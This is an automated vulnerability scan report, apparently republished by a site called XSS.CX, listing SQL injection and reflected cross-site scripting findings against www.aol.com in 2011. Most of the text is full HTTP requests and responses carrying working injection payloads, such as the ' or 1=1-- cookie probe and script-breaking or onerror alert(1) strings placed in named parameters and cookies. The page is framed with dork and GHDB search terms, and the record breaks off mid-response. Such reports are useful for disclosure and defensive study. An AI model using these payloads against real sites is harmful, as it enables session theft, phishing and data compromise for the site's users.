XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.aol.com

Report generated by XSS.CX at Thu Aug 18 17:29:52 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

2. Cross-site scripting (reflected)

XSS in www.aol.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

2.1. http://www.aol.com/ [dlact parameter]

2.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

2.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]

2.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

2.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]

2.6. http://www.aol.com/ [dlact cookie]

2.7. http://www.aol.com/ [rrpmo1 cookie]

2.8. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [rrpmo1 cookie]

3. Silverlight cross-domain policy

4. Flash cross-domain policy

5. Cookie without HttpOnly flag set

5.1. http://www.aol.com/

5.2. http://www.aol.com/ajax.jsp

5.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

5.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

5.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

6. Cross-domain Referer leakage

6.1. http://www.aol.com/

6.2. http://www.aol.com/

6.3. http://www.aol.com/ajax.jsp

6.4. http://www.aol.com/ajax.jsp

6.5. http://www.aol.com/ajax.jsp

6.6. http://www.aol.com/ajax.jsp

6.7. http://www.aol.com/ajax.jsp

6.8. http://www.aol.com/ajax.jsp

6.9. http://www.aol.com/ajax.jsp

6.10. http://www.aol.com/ajax.jsp

6.11. http://www.aol.com/ajax.jsp

6.12. http://www.aol.com/ajax.jsp

6.13. http://www.aol.com/ajax.jsp

6.14. http://www.aol.com/ajax.jsp

6.15. http://www.aol.com/ajax.jsp

6.16. http://www.aol.com/ajax.jsp

6.17. http://www.aol.com/ajax.jsp

6.18. http://www.aol.com/ajax.jsp

6.19. http://www.aol.com/ajax.jsp

6.20. http://www.aol.com/ajax.jsp

6.21. http://www.aol.com/ajax.jsp

6.22. http://www.aol.com/ajax.jsp

6.23. http://www.aol.com/ajax.jsp

6.24. http://www.aol.com/ajax.jsp

6.25. http://www.aol.com/ajax.jsp

6.26. http://www.aol.com/ajax.jsp

6.27. http://www.aol.com/ajax.jsp

6.28. http://www.aol.com/ajax.jsp

6.29. http://www.aol.com/ajax.jsp

7. Cross-domain script include

7.1. http://www.aol.com/

7.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

7.3. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

8. HTML does not specify charset

8.1. http://www.aol.com/ads/load_v7.html

8.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html

9. Content type incorrectly stated

9.1. http://www.aol.com/ajax.jsp

9.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The tst cookie appears to be vulnerable to SQL injection attacks. The payloads 16870303'%20or%201%3d1--%20 and 16870303'%20or%201%3d2--%20 were each submitted in the tst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a16870303'%20or%201%3d1--%20; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl2

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-89.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: JSESSIONID=5A5555ED7A95E54FD93F69FEEB2177FA; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:18:25 GMT; Path=/
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></span>
<span class="dn" id="dl-vslot">dynamiclead2</span>
<span class="dn" id="dl-playlist"></span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a><span class='credit'>TMZ.com</span><h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a></h2>
<p>At 11, Melissa Sue Anderson beat out hundreds of kids for the role she played for seven straight seasons.

</p>

<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a></p>
<h3>Hollywood Headlines
</h3>
<ul id="om_dl2_slde">
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" h
...[SNIP]...

Request 2

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a16870303'%20or%201%3d2--%20; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-89.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:18:27 GMT; Path=/
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></span>
<span class="dn" id="dl-vslot">dynamiclead2</span>
<span class="dn" id="dl-playlist"></span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a><span class='credit'>TMZ.com</span><h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a></h2>
<p>At 11, Melissa Sue Anderson beat out hundreds of kids for the role she played for seven straight seasons.

</p>

<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a></p>
<h3>Hollywood Headlines
</h3>
<ul id="om_dl2_slde">
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" href="http://www.huffingtonpost.com/2011/08/18/chaz-bono-becoming-cha
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.aol.com/ [dlact parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee19"%3balert(1)//75b3c833dad was submitted in the dlact parameter. This input was echoed as 7ee19";alert(1)//75b3c833dad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?icid=aolcomlogorefresh5&dlact=dl17ee19"%3balert(1)//75b3c833dad HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:19:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-58.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2641CC6722AD709C0622A7AB9BAA86AD; Path=/aol
Content-Length: 81550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl17ee19";alert(1)//75b3c833dad";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 25;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b07fd(a)c00e971c226 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video//%22nsb07fd(a)c00e971c226=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-96.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=0429E687AA23CD2469AB159372279C47; Path=/aol
Connection: close
Content-Length: 16698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
}

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_"nsb07fd(a)c00e971c226="alert(0x000254)";
}else{
p23 = p23 + "vd_"nsb07fd(a)c00e971c226="alert(0x000254)";
}
s_265.prop23 = p23;

var s_265_user_authen
...[SNIP]...

2.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc68e"%3bf01dcb363a6 was submitted in the REST URL parameter 2. This input was echoed as cc68e";f01dcb363a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video//cc68e"%3bf01dcb363a6=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-50.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=31E6750C85E83345318B1169C690E9BE; Path=/aol
Keep-Alive: timeout=5, max=22
Connection: Keep-Alive
Content-Length: 16685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
}

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_cc68e";f01dcb363a6="alert(0x000254)";
}else{
p23 = p23 + "vd_cc68e";f01dcb363a6="alert(0x000254)";
}
s_265.prop23 = p23;

var s_265_user_authentica
...[SNIP]...

2.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27c59"%3b25d661220d4 was submitted in the REST URL parameter 3. This input was echoed as 27c59";25d661220d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/111669922800127c59"%3b25d661220d4/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-50.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=70026B65B3B457B95CCC8D06570E1399; Path=/aol
Content-Length: 40773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

p23 = s_265.prop23;
if (typeof(p23) == 'undefined') {
p23 = "";
}
if (p23.length > 0){
p23 = p23 + ", vd_111669922800127c59";25d661220d4";
}else{
p23 = p23 + "vd_111669922800127c59";25d661220d4";
}
s_265.prop23 = p23;

var s_265_user_authenticated=false;
s_
...[SNIP]...

2.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3dd"><img%20src%3da%20onerror%3dalert(1)>c5f8d88b13f was submitted in the REST URL parameter 3. This input was echoed as ec3dd"><img src=a onerror=alert(1)>c5f8d88b13f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001ec3dd"><img%20src%3da%20onerror%3dalert(1)>c5f8d88b13f/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-100.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=4D1A143DF59B0EF72056711580694C5F; Path=/aol
Content-Length: 40854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<div class="videoPerm" id="1116699228001ec3dd"><img src=a onerror=alert(1)>c5f8d88b13f-mod">
...[SNIP]...

2.6. http://www.aol.com/ [dlact cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0507"-alert(1)-"c2760e5e3ad was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl5e0507"-alert(1)-"c2760e5e3ad

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-52.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=735A63F95E2408B60CA93A698B703DCD; Path=/aol
Content-Length: 81380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
